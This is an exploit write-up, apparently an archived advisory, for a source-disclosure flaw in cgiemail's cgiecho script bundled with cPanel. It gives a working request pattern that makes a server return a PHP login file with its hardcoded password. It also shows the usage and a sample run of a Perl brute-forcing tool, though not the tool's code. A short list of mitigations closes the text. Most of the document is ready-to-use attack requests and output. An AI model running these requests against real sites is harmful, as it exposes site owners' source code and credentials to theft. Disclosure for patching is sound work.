Cgiemail - Source Code Disclosure/Local File Inclusion Exploit

cgiecho, a script included with cgiemail, will return any file under a website's document root if the file contains square brackets and the text within the brackets is guessable.

cgiemail is currently shipped with cPanel, enabled by default.


Example

For page:

<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }

Requesting:

http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']

Returns:

<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
&lt;?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

cgiemail-exploit.pl

Usage: ./cgiemail-exploit.pl [options] target

Options:
  --names         Check for names in comma-separated list
  --num           Check for numbers
  --num-max       Maximum number to check (default 10)
  --php           Check PHP $_SERVER Variables
  --batch         Number of arguments sent per request (default 10)
  --cgiecho-path  Path of cgiecho on server (default '/cgi-sys/cgiecho/')
  --user-agent    Set user-agent (default 'Mozilla/5.0')
  --deley         Pause between requests in seconds (default 1)
  --timeout       Set connection timeout (default 10)

Example

$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&

Caveats

  • if no value is supplied for a variable it is excluded from the output, so expect some '$_POST/$_GET' variables in the returned file to have their [] index missing...

Solutions

  • don't use cgiemail...
  • disable cgiemail...
  • if for whatever reason you're stuck on a system with cgiemail: the maximum variable length is 255, so a long string inside square brackets will return an error.
  • don't use square brackets?

Reference